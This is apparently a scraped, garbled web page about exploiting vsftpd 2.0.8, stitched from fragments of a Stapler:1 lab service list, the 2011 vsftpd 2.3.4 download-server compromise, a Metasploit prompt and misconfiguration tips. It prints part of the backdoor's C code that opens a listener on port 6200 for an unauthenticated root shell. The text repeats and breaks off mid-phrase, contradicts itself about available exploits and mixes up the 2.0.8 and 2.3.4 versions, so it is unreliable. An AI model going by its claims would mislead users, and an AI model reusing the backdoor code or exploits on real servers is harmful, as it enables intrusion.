Stapler: 1 * vsftpd 2.0.8 or later. * OpenSSH 7.2p2. * MySQL 5.7.12-0ubuntu1. * PHP cli server 5.5. * Samba 4.3.9. ftp-vsftpd-backdoor NSE script - Nmap
msf6 > run
In July 2011, the primary download server for vsftpd (Very Secure FTP Daemon) was compromised by an unknown attacker.
From there, any command can be executed with root privileges. vsftpd 2.0.8 exploit github
Improper handling of certain globbing patterns in the deny_file configuration.
: A feature to remove temporary files or log entries created during the exploit attempt to minimize the footprint on the target system.
The modified source code contained a few extra lines in str.c and vsftpd.c . When the malicious daemon started, it would open a backdoor shell on port . Crucially, authentication was bypassed. Any attacker who connected to port 6200 would receive a root shell instantly. Stapler: 1 * vsftpd 2
There are several proof-of-concept (PoC) exploits available on GitHub that demonstrate the vulnerability. One such exploit is the vsftpd_2.0.8_exploit.py script, which can be used to test the vulnerability.
int fd, rfd; struct sockaddr_in sa; if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) exit(1); memset(&sa, 0, sizeof(sa)); sa.sin_family = AF_INET; sa.sin_port = htons(6200); sa.sin_addr.s_addr = INADDR_ANY; if((bind(fd,(struct sockaddr *)&sa, sizeof(struct sockaddr))) < 0) exit(1); if((listen(fd, 100)) == -1) exit(1);
There is no single "magic" exploit code on GitHub for version 2.0.8 like there is for the 2.3.4 backdoor. Instead, this version is frequently exploited through misconfiguration information disclosure Anonymous Login : By default, many older installations allow Anonymous FTP login * PHP cli server 5
If the version is indeed v2.0.8, look for weak configuration files (usually located at /etc/vsftpd.conf ). High-risk lines include:
When you search the keyword, you will find three main categories: